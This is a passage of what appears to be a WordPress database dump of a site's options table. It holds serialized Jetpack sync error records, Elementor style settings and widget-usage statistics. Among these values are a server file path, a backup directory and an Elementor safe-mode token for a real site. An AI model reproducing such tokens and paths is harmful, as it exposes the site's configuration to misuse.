jetpack.wordpress.com\";}}s:10:\"error_data\";a:0:{}s:18:\"\0*\0additional_data\";a:0:{}}}s:18:\"\0*\0additional_data\";a:1:{s:19:\"http_request_failed\";a:1:{i:0;i:-10520;}}}s:15:\"1781241235.8114\";O:8:\"WP_Error\":3:{s:6:\"errors\";a:1:{s:27:\"concurrent_processing_error\";a:1:{i:0;s:61:\"There is another sync processing running for the same blog ID\";}}s:10:\"error_data\";a:1:{s:27:\"concurrent_processing_error\";a:5:{s:7:\"headers\";a:14:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Fri, 12 Jun 2026 05:13:56 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"vary\";a:2:{i:0;s:15:\"Accept-Encoding\";i:1;s:20:\"accept, content-type\";}s:8:\"x-hacker\";s:62:\"Want root?  Visit join.a8c.com/hacker and mention this header.\";s:11:\"host-header\";s:13:\"WordPress.com\";s:4:\"link\";s:109:\"<https://public-api.wordpress.com/wp-json/?rest_route=/sites/jetpack.wordpress.com>; rel=\"https://api.w.org/\"\";s:10:\"set-cookie\";s:127:\"tk_ai=oyvp7xAraJ%2F0k%2Bh%2BBEg%2FJsco; expires=Wed, 11 Jun 2031 05:13:56 GMT; Max-Age=157680000; path=/; domain=.wordpress.com\";s:22:\"jetpack-dedicated-sync\";s:2:\"on\";s:16:\"content-encoding\";s:2:\"br\";s:4:\"x-ac\";s:17:\"4.atl _dfw BYPASS\";s:7:\"alt-svc\";s:5:\"clear\";s:25:\"strict-transport-security\";s:16:\"max-age=31536000\";s:13:\"server-timing\";s:49:\"a8c-cdn, dc;desc=atl, cache;desc=BYPASS;dur=149.0\";}s:4:\"body\";s:472:\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodResponse>\n  <fault>\n    <value>\n      <struct>\n        <member>\n          <name>faultCode</name>\n          <value><int>400</int></value>\n        </member>\n        <member>\n          <name>faultString</name>\n          <value><string>Jetpack: [concurrent_processing_error] There is another sync processing running for the same blog ID</string></value>\n        </member>\n      </struct>\n    </value>\n  </fault>\n</methodResponse>\n\";s:8:\"response\";a:2:{s:4:\"code\";i:200;s:7:\"message\";s:2:\"OK\";}s:7:\"cookies\";a:1:{i:0;O:14:\"WP_Http_Cookie\":7:{s:4:\"name\";s:5:\"tk_ai\";s:5:\"value\";s:24:\"oyvp7xAraJ/0k+h+BEg/Jsco\";s:7:\"expires\";i:1938921236;s:4:\"path\";s:1:\"/\";s:6:\"domain\";s:13:\"wordpress.com\";s:4:\"port\";N;s:9:\"host_only\";b:0;}}s:8:\"filename\";N;}}s:18:\"\0*\0additional_data\";a:1:{s:27:\"concurrent_processing_error\";a:1:{i:0;i:400;}}}}','yes'),(1379702,'everest_forms_recaptcha_hcaptcha_site_key','','yes'),(1379703,'everest_forms_recaptcha_hcaptcha_secret_key','','yes'),(1379704,'everest_forms_recaptcha_v3_threshold_score','0.4','yes'),(1379885,'jetpack_search_plan_info','a:3:{s:23:\"supports_instant_search\";b:0;s:28:\"supports_only_classic_search\";b:0;s:15:\"supports_search\";b:0;}','yes'),(1621289,'elementor_events_db_version','1.0.0','no'),(1628800,'jetpack_protect_activating','activating','no'),(1628839,'jp_sync_last_success_immediate-send','1772915523.9525','off'),(1674648,'elementor_scheme_color','a:4:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";}','yes'),(1674649,'elementor_scheme_typography','a:4:{i:1;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"600\";}i:2;a:2:{s:11:\"font_family\";s:11:\"Roboto Slab\";s:11:\"font_weight\";s:3:\"400\";}i:3;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"400\";}i:4;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"500\";}}','yes'),(1674650,'elementor_scheme_color-picker','a:8:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";i:5;s:7:\"#4054b2\";i:6;s:7:\"#23a455\";i:7;s:4:\"#000\";i:8;s:4:\"#fff\";}','yes'),(1833990,'jetpack_site_icon_url','https://ekmsliberia.info/wp-content/uploads/2022/07/cropped-small-logo.png','yes'),(1899245,'ai1wm_backups_path','/home/ekmslib/public_html/wp-content/ai1wm-backups','yes'),(1921697,'elementor_safe_mode_allowed_plugins','a:2:{s:9:\"elementor\";s:23:\"elementor/elementor.php\";s:13:\"elementor_pro\";s:31:\"elementor-pro/elementor-pro.php\";}','yes'),(1921698,'elementor_safe_mode_token','96121cf68c012b28da344983e5030195fb7039141b5b35446036bb157e6eb75c','yes'),(1921699,'elementor_safe_mode','yes','yes'),(1921706,'theme_mods_elementor-safe','a:1:{s:18:\"custom_css_post_id\";i:-1;}','off'),(2165448,'pods_framework_version_first','2.8.15','yes'),(2188849,'tidio-php-7-2-requirement-notice','1','yes'),(2188924,'elementor_controls_usage','a:8:{s:7:\"wp-page\";a:18:{s:9:\"jet-posts\";a:2:{s:5:\"count\";i:4;s:8:\"controls\";a:3:{s:7:\"content\";a:3:{s:15:\"section_general\";a:18:{s:17:\"equal_height_cols\";i:4;s:9:\"post_type\";i:3;s:12:\"show_excerpt\";i:2;s:9:\"show_meta\";i:3;s:9:\"show_more\";i:3;s:6:\"number\";i:4;s:7:\"columns\";i:4;s:11:\"related_tax\";i:1;s:8:\"post_ids\";i:1;s:11:\"show_author\";i:2;s:9:\"show_date\";i:1;s:13:\"show_comments\";i:2;s:13:\"show_image_as\";i:1;s:10:\"show_terms\";i:2;s:14:\"show_terms_tax\";i:1;s:13:\"title_trimmed\";i:1;s:12:\"title_length\";i:1;s:14:\"excerpt_length\";i:1;}s:27:\"section_posts_custom_fields\";a:4:{s:18:\"title_related_meta\";i:4;s:20:\"content_related_meta\";i:4;s:27:\"meta_title_related_position\";i:1;s:29:\"meta_content_related_position\";i:1;}s:16:\"section_carousel\";a:3:{s:6:\"arrows\";i:1;s:8:\"autoplay\";i:1;s:8:\"infinite\";i:1;}}s:5:\"style\";a:5:{s:19:\"section_title_style\";a:8:{s:11:\"title_color\";i:2;s:27:\"title_typography_typography\";i:2;s:26:\"title_typography_font_size\";i:2;s:28:\"title_typography_font_weight\";i:2;s:15:\"title_alignment\";i:1;s:13:\"title_padding\";i:1;s:12:\"title_margin\";i:1;s:17:\"title_color_hover\";i:1;}s:17:\"section_box_style\";a:3:{s:17:\"box_border_border\";i:1;s:16:\"box_border_width\";i:1;s:16:\"box_border_color\";i:1;}s:21:\"section_content_style\";a:2:{s:10:\"content_bg\";i:2;s:15:\"content_padding\";i:2;}s:24:\"section_terms_link_style\";a:5:{s:32:\"terms_link_typography_typography\";i:2;s:31:\"terms_link_typography_font_size\";i:2;s:33:\"terms_link_typography_font_weight\";i:1;s:19:\"terms_link_bg_color\";i:2;s:16:\"terms_link_color\";i:1;}s:21:\"section_excerpt_style\";a:3:{s:13:\"excerpt_color\";i:1;s:29:\"excerpt_typography_typography\";i:1;s:28:\"excerpt_typography_font_size\";i:1;}}s:8:\"advanced\";a:3:{s:15:\"section_effects\";a:2:{s:10:\"_animation\";i:1;s:18:\"animation_duration\";i:1;}s:19:\"_section_background\";a:1:{s:22:\"_background_background\";i:1;}s:14:\"_section_style\";a:1:{s:23:\"_element_vertical_align\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:138;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:108;s:21:\"space_between_widgets\";i:1;}}s:5:\"style\";a:2:{s:14:\"section_border\";a:2:{s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}s:12:\"section_typo\";a:3:{s:13:\"heading_color\";i:1;s:10:\"color_text\";i:1;s:16:\"color_link_hover\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:4;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:76;s:8:\"controls\";a:3:{s:6:\"layout\";a:3:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:76;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:32;}s:14:\"section_layout\";a:6:{s:16:\"content_position\";i:2;s:6:\"layout\";i:3;s:3:\"gap\";i:1;s:15:\"stretch_section\";i:5;s:6:\"height\";i:1;s:13:\"custom_height\";i:1;}}s:5:\"style\";a:3:{s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}s:18:\"section_background\";a:6:{s:21:\"background_background\";i:4;s:16:\"background_color\";i:1;s:16:\"background_image\";i:2;s:19:\"background_position\";i:2;s:21:\"background_attachment\";i:2;s:15:\"background_size\";i:2;}s:21:\"section_shape_divider\";a:3:{s:26:\"shape_divider_bottom_width\";i:1;s:27:\"shape_divider_bottom_height\";i:1;s:25:\"shape_divider_bottom_flip\";i:1;}}s:8:\"advanced\";a:3:{s:16:\"section_advanced\";a:2:{s:7:\"padding\";i:6;s:6:\"margin\";i:2;}s:15:\"section_effects\";a:1:{s:17:\"motion_fx_devices\";i:1;}s:19:\"_section_responsive\";a:3:{s:20:\"reverse_order_tablet\";i:1;s:20:\"reverse_order_mobile\";i:1;s:11:\"hide_mobile\";i:1;}}}}s:7:\"heading\";a:2:{s:5:\"count\";i:25;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:25;s:11:\"header_size\";i:9;s:5:\"align\";i:7;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:6:{s:11:\"title_color\";i:18;s:21:\"typography_typography\";i:19;s:20:\"typography_font_size\";i:12;s:22:\"typography_font_weight\";i:7;s:23:\"text_shadow_text_shadow\";i:1;s:26:\"typography_text_decoration\";i:3;}}}}s:11:\"text-editor\";a:2:{s:5:\"count\";i:54;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:54;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:5:{s:10:\"text_color\";i:50;s:21:\"typography_typography\";i:46;s:20:\"typography_font_size\";i:47;s:5:\"align\";i:42;s:22:\"typography_font_weight\";i:2;}}}}s:6:\"spacer\";a:2:{s:5:\"count\";i:5;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:3;}}}}s:24:\"jet-smart-filters-search\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:15:\"section_general\";a:5:{s:9:\"filter_id\";i:1;s:16:\"content_provider\";i:1;s:10:\"apply_type\";i:1;s:24:\"typing_min_letters_count\";i:1;s:10:\"show_label\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_label_style\";a:2:{s:27:\"label_typography_typography\";i:1;s:28:\"label_typography_font_weight\";i:1;}}}}s:28:\"jet-smart-filters-checkboxes\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:15:\"section_general\";a:5:{s:9:\"filter_id\";i:1;s:16:\"content_provider\";i:1;s:25:\"additional_providers_list\";i:1;s:10:\"show_label\";i:1;s:28:\"additional_providers_enabled\";i:1;}}s:5:\"style\";a:3:{s:19:\"section_items_style\";a:3:{s:16:\"filters_position\";i:1;s:32:\"filters_space_between_horizontal\";i:1;s:22:\"filters_list_alignment\";i:1;}s:22:\"section_checkbox_style\";a:4:{s:22:\"checkbox_border_border\";i:1;s:21:\"checkbox_border_width\";i:1;s:21:\"checkbox_border_color\";i:1;s:22:\"checkbox_border_radius\";i:1;}s:19:\"section_label_style\";a:2:{s:27:\"label_typography_typography\";i:1;s:28:\"label_typography_font_weight\";i:1;}}}}s:5:\"posts\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:3;}}s:7:\"content\";a:3:{s:14:\"section_layout\";a:8:{s:5:\"_skin\";i:3;s:20:\"custom_template_list\";i:3;s:20:\"custom_skin_template\";i:3;s:21:\"custom_posts_per_page\";i:3;s:18:\"custom_same_height\";i:3;s:14:\"custom_link_to\";i:3;s:15:\"custom_postlink\";i:3;s:14:\"custom_columns\";i:1;}s:13:\"section_query\";a:3:{s:15:\"posts_post_type\";i:3;s:14:\"posts_query_id\";i:1;s:11:\"posts_order\";i:1;}s:18:\"section_pagination\";a:2:{s:21:\"pagination_page_limit\";i:1;s:15:\"pagination_type\";i:2;}}s:5:\"style\";a:2:{s:28:\"custom_section_design_layout\";a:2:{s:17:\"custom_column_gap\";i:2;s:14:\"custom_row_gap\";i:2;}s:24:\"section_pagination_style\";a:2:{s:18:\"pagination_spacing\";i:2;s:22:\"pagination_spacing_top\";i:2;}}}}s:28:\"jet-smart-filters-pagination\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:2:{s:15:\"section_general\";a:1:{s:16:\"content_provider\";i:1;}s:16:\"section_controls\";a:1:{s:19:\"pages_center_offset\";i:1;}}s:5:\"style\";a:1:{s:22:\"pagination_items_style\";a:8:{s:31:\"pagination_items_bg_color_hover\";i:1;s:28:\"pagination_items_color_hover\";i:1;s:29:\"pagination_items_vertical_gap\";i:1;s:30:\"pagination_items_border_border\";i:1;s:29:\"pagination_items_border_width\";i:1;s:29:\"pagination_items_border_color\";i:1;s:30:\"pagination_items_border_radius\";i:1;s:26:\"pagination_items_alignment\";i:1;}}}}s:9:\"shortcode\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:8:\"_padding\";i:1;}}}}s:5:\"image\";a:2:{s:5:\"count\";i:37;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:7:{s:5:\"image\";i:35;s:10:\"image_size\";i:10;s:22:\"image_custom_dimension\";i:6;s:14:\"caption_source\";i:5;s:7:\"link_to\";i:5;s:4:\"link\";i:5;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:21:\"section_style_caption\";a:2:{s:10:\"text_color\";i:5;s:29:\"caption_typography_typography\";i:1;}}}}s:7:\"divider\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:3:{s:5:\"color\";i:3;s:3:\"gap\";i:1;s:6:\"weight\";i:2;}}s:7:\"content\";a:1:{s:15:\"section_divider\";a:3:{s:5:\"style\";i:2;s:5:\"width\";i:2;s:5:\"align\";i:2;}}}}s:9:\"accordion\";a:2:{s:5:\"count\";i:4;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:4:\"tabs\";i:4;}}}}s:6:\"slides\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:2:{s:14:\"section_slides\";a:2:{s:6:\"slides\";i:1;s:13:\"slides_height\";i:1;}s:22:\"section_slider_options\";a:1:{s:17:\"content_animation\";i:1;}}}}s:15:\"jet-ajax-search\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:28:\"section_search_form_settings\";a:4:{s:23:\"search_placeholder_text\";i:1;s:25:\"show_search_category_list\";i:1;s:34:\"search_category_select_placeholder\";i:1;s:15:\"search_taxonomy\";i:1;}s:29:\"section_results_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}s:23:\"section_search_settings\";a:1:{s:13:\"search_source\";i:1;}}s:5:\"style\";a:2:{s:27:\"section_search_submit_style\";a:1:{s:22:\"search_submit_bg_color\";i:1;}s:29:\"section_search_category_style\";a:1:{s:21:\"search_category_color\";i:1;}}}}s:20:\"jet-blog-smart-tiles\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:5:{s:10:\"min_height\";i:1;s:10:\"show_terms\";i:1;s:14:\"show_terms_num\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"show_date\";i:1;}s:13:\"section_query\";a:3:{s:9:\"post_type\";i:1;s:15:\"custom_query_by\";i:1;s:8:\"post_ids\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:2:{s:17:\"section_box_style\";a:1:{s:9:\"boxes_gap\";i:1;}s:21:\"section_content_style\";a:6:{s:17:\"boxes_title_color\";i:1;s:23:\"boxes_title_color_hover\";i:1;s:33:\"boxes_title_typography_typography\";i:1;s:32:\"boxes_title_typography_font_size\";i:1;s:34:\"boxes_title_typography_font_weight\";i:1;s:21:\"boxes_title_alignment\";i:1;}}}}s:6:\"button\";a:2:{s:5:\"count\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:6:{s:4:\"text\";i:4;s:4:\"link\";i:4;s:5:\"align\";i:4;s:13:\"selected_icon\";i:3;s:10:\"icon_align\";i:3;s:11:\"icon_indent\";i:3;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:7:{s:21:\"typography_typography\";i:4;s:20:\"typography_font_size\";i:4;s:25:\"typography_text_transform\";i:4;s:17:\"button_text_color\";i:4;s:16:\"background_color\";i:4;s:11:\"hover_color\";i:4;s:29:\"button_background_hover_color\";i:4;}}}}}s:4:\"loop\";a:6:{s:5:\"image\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:3;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"align\";i:2;s:5:\"image\";i:2;s:7:\"link_to\";i:1;s:4:\"link\";i:1;}}}}s:16:\"theme-post-title\";a:2:{s:5:\"count\";i:4;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:6;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:4;s:5:\"align\";i:2;s:4:\"link\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;s:22:\"typography_font_family\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:9;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:9;}}s:5:\"style\";a:1:{s:14:\"section_border\";a:2:{s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:6;s:8:\"controls\";a:2:{s:6:\"layout\";a:3:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}s:14:\"section_layout\";a:2:{s:16:\"content_position\";i:1;s:6:\"layout\";i:2;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}s:5:\"style\";a:2:{s:14:\"section_border\";a:2:{s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}s:18:\"section_background\";a:2:{s:21:\"background_background\";i:3;s:16:\"background_color\";i:3;}}}}s:9:\"post-info\";a:2:{s:5:\"count\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:2:{s:9:\"icon_list\";i:4;s:4:\"view\";i:2;}}s:5:\"style\";a:2:{s:17:\"section_icon_list\";a:3:{s:10:\"icon_align\";i:3;s:13:\"space_between\";i:1;s:13:\"divider_color\";i:1;}s:18:\"section_text_style\";a:4:{s:11:\"text_indent\";i:1;s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;s:27:\"icon_typography_font_weight\";i:1;}}}}s:25:\"theme-post-featured-image\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:3:{s:7:\"link_to\";i:1;s:5:\"image\";i:1;s:4:\"link\";i:1;}}}}}s:11:\"single-post\";a:12:{s:16:\"theme-post-title\";a:2:{s:5:\"count\";i:5;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:5;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:5;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:3;s:21:\"typography_typography\";i:4;s:20:\"typography_font_size\";i:4;s:22:\"typography_font_weight\";i:2;s:22:\"typography_font_family\";i:1;}}}}s:25:\"theme-post-featured-image\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:3;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:3;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:3:{s:19:\"image_border_border\";i:1;s:18:\"image_border_width\";i:1;s:18:\"image_border_color\";i:1;}}}}s:18:\"theme-post-content\";a:2:{s:5:\"count\";i:5;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:21:\"typography_typography\";i:4;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_family\";i:1;}}}}s:9:\"icon-list\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:17;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:17;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:2:{s:7:\"padding\";i:2;s:6:\"margin\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}s:5:\"image\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:5;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:7:\"link_to\";i:2;s:5:\"image\";i:3;s:4:\"link\";i:2;s:10:\"image_size\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:14;s:8:\"controls\";a:3:{s:6:\"layout\";a:3:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:14;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:3;}s:14:\"section_layout\";a:1:{s:6:\"layout\";i:4;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:2;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:1:{s:21:\"background_background\";i:1;}}}}s:9:\"post-info\";a:2:{s:5:\"count\";i:5;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:2:{s:4:\"view\";i:2;s:9:\"icon_list\";i:5;}}s:5:\"style\";a:2:{s:17:\"section_icon_list\";a:5:{s:13:\"space_between\";i:3;s:10:\"icon_align\";i:1;s:7:\"divider\";i:1;s:13:\"divider_width\";i:1;s:13:\"divider_color\";i:1;}s:18:\"section_text_style\";a:4:{s:26:\"icon_typography_typography\";i:4;s:25:\"icon_typography_font_size\";i:4;s:11:\"text_indent\";i:3;s:10:\"text_color\";i:4;}}}}s:15:\"post-navigation\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:31:\"section_post_navigation_content\";a:1:{s:10:\"show_label\";i:1;}}s:5:\"style\";a:1:{s:11:\"title_style\";a:3:{s:10:\"text_color\";i:1;s:27:\"title_typography_typography\";i:1;s:26:\"title_typography_font_size\";i:1;}}}}s:6:\"button\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:14:\"section_button\";a:7:{s:4:\"text\";i:1;s:4:\"link\";i:1;s:5:\"align\";i:1;s:4:\"size\";i:1;s:13:\"selected_icon\";i:1;s:10:\"icon_align\";i:1;s:11:\"icon_indent\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:7:{s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:16:\"background_color\";i:1;s:11:\"hover_color\";i:1;s:29:\"button_background_hover_color\";i:1;s:13:\"border_border\";i:1;s:12:\"border_color\";i:1;}}}}s:7:\"heading\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:5:\"align\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;}}s:8:\"advanced\";a:2:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:2;}s:15:\"_section_border\";a:2:{s:14:\"_border_border\";i:2;s:13:\"_border_width\";i:2;}}}}s:8:\"nav-menu\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:5:{s:4:\"menu\";i:2;s:11:\"align_items\";i:2;s:7:\"pointer\";i:2;s:6:\"layout\";i:1;s:12:\"submenu_icon\";i:1;}}s:5:\"style\";a:1:{s:23:\"section_style_main-menu\";a:5:{s:15:\"color_menu_item\";i:2;s:21:\"color_menu_item_hover\";i:2;s:28:\"padding_horizontal_menu_item\";i:2;s:26:\"padding_vertical_menu_item\";i:2;s:18:\"menu_space_between\";i:2;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:2:{s:7:\"_margin\";i:2;s:8:\"_padding\";i:2;}}}}}s:6:\"header\";a:8:{s:5:\"image\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:3:{s:5:\"image\";i:2;s:7:\"link_to\";i:1;s:4:\"link\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:7;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:4:{s:12:\"_inline_size\";i:7;s:16:\"content_position\";i:2;s:5:\"align\";i:1;s:21:\"space_between_widgets\";i:1;}}s:5:\"style\";a:1:{s:12:\"section_typo\";a:1:{s:10:\"text_align\";i:1;}}}}s:7:\"heading\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:11:\"text-editor\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:5:\"align\";i:1;s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:6:\"button\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:4:{s:4:\"text\";i:1;s:5:\"align\";i:1;s:4:\"size\";i:1;s:4:\"link\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:5:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:16:\"background_color\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:3:{s:6:\"layout\";a:3:{s:14:\"section_layout\";a:3:{s:16:\"content_position\";i:2;s:3:\"gap\";i:2;s:6:\"layout\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:2:{s:6:\"margin\";i:1;s:7:\"z_index\";i:2;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:2;}}}}s:8:\"nav-menu\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:3:{s:4:\"menu\";i:1;s:11:\"align_items\";i:1;s:7:\"pointer\";i:1;}}s:5:\"style\";a:2:{s:23:\"section_style_main-menu\";a:7:{s:26:\"menu_typography_typography\";i:1;s:27:\"menu_typography_font_family\";i:1;s:25:\"menu_typography_font_size\";i:1;s:27:\"menu_typography_font_weight\";i:1;s:15:\"color_menu_item\";i:1;s:21:\"color_menu_item_hover\";i:1;s:29:\"pointer_color_menu_item_hover\";i:1;}s:22:\"section_style_dropdown\";a:3:{s:19:\"color_dropdown_item\";i:1;s:25:\"color_dropdown_item_hover\";i:1;s:36:\"background_color_dropdown_item_hover\";i:1;}}s:8:\